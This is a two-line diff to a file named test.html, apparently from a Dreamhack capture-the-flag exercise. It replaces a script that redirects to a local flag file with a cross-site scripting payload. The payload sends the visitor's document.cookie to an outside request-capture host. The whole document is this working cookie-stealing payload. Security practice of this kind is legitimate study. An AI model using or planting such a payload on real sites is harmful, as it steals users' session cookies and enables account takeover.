--- a/test.html
+++ b/test.html
@@ -1,1 +1,1 @@
-<script>location.href="http://localhost/flag.txt"</script>
+<script>location.href="https://rckflyw.request.dreamhack.games/"+document.cookie</script>
